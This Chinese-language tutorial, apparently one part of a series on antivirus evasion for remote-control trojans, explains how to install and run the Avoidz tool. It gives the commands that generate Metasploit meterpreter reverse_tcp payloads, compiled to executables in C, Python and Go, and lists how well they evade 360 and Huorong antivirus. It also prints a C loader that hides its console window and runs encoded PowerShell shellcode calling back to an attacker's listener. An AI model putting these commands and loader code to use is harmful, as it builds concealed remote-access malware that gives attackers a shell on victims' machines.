0x01 免殺能力一查表

幾點說明：

1、上表中標識 √ 說明相應殺毒軟件未檢測出病毒，也就是代表了Bypass。

2、為了更好的對比效果，大部分測試payload均使用msf的windows/meterperter/reverse_tcp模塊生成。

3、由于本機測試時只是安裝了360全家桶和火絨，所以默認情況下360和火絨殺毒情況指的是靜態+動態查殺。360殺毒版本5.0.0.8160(2020.01.01)，火絨版本5.0.34.16(2020.01.01)，360安全衛士12.0.0.2002(2020.01.01)。

4、其他殺軟的檢測指標是在virustotal.com（簡稱VT）上在線查殺，所以可能只是代表了靜態查殺能力，數據僅供參考，不足以作為免殺的精確判斷指標。

5、完全不必要苛求一種免殺技術能bypass所有殺軟，這樣的技術肯定是有的，只是沒被公開，一旦公開第二天就能被殺了，其實我們只要能bypass目標主機上的殺軟就足夠了。

0x02 avoidz介紹

Avoidz是一個比較使用比較簡單的小工具，利用msf生成powershell的shellocde，然后利用c#、python、go、ruby等語言對shellcode進行編譯生成exe而達到免殺的效果，套路比較簡單，但免殺效果還算不錯。

0x03安裝avoidz

avoidz使用是非常簡單的，一行命令就可以，但安裝比較費勁。因為官方是3年前更新的，里面有些錯誤，按官方的setup.sh是沒法安裝成功的。

首先從github上clone到本地

git clone https://github.com/M4sc3r4n0/avoidz

進入avoidz目錄，執行chmod +x setup.sh

執行安裝程序./setup.sh

會要求按照ruby、msf、wine、wine-python、wine-pyinstaller、golong等。

0x04 avoidz使用說明

安裝好之后，使用起來非常非常簡單，只有四個參數。

-h, --lhost value ip_addr|default = 127.0.0.1-p, --lport value port_number|default = 4444-m, --payload value payload to use|default = windows/meterpreter/reverse_tcp-f, --format value output format: c1, c2, cs, py, go

參數說明：

-h msf監聽的IP，也就是攻擊者的

-p msf監聽的端口

-m msf的payload

-f 提供了5種編譯格式，三種c/c#，一種python，一種go，都是生成exe文件

默認生成的payload目錄為/root/目錄下。

0x05 使用avoidz編譯C#生成exe

提供3種C代碼編譯成exe的方式，想了解詳情的可以cat avoidz.rb查看具體區別。

我以第一種為例進行測試

./avoidz.rb -h 192.168.142.134 -p 5555 -m windows/meterpreter/reverse_tcp -f c1

這種方式的C代碼為

#include <windows.h> int shellCode(){system("color 63");system("powershell.exe -nop -win Hidden -noni -enc #{powershell_encoded}");/*((Shell Code into the console))*/return 0; } void hide(){HWND stealth;AllocConsole();stealth = FindWindowA("ConsoleWindowClass",NULL);ShowWindow (stealth,0); } int main(){hide();shellCode();return 0; } }

執行后可正常上線

開啟殺軟進行測試，靜態測試沒問題，行為檢測馬上露餡。

0x06 使用avoidz編譯python生成exe

使用python生成exe文件

./avoidz.rb -h 10.211.55.2 -p 3333 -m windows/meterpreter/reverse_tcp -f py

靜態查殺沒問題，行為檢測依據被攔

0x07 使用avoidz編譯golang生成exe

使用go生成exe文件

./avoidz.rb -h 10.211.55.2 -p 3333 -m windows/meterpreter/reverse_tcp -f go

go版本的靜態查殺都沒通過，行為檢測依據被攔

0x07 小結

avoidz的原理還是比較簡單的，msfvenom生成powershell的shellcode，然后各種語言編譯一下生成exe，靜態檢測查殺率還算可以，但行為檢測就很容易被查殺出來，和TheFatRat具有相同的缺陷。倒是可以借鑒下他的原理，自己寫個免殺工具。

0x08 參考

官方使用教程：https://www.youtube.com/watch?v=ZilOByKkrVk

總結

以上是生活随笔為你收集整理的远控免杀专题11-Avoidz免杀的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。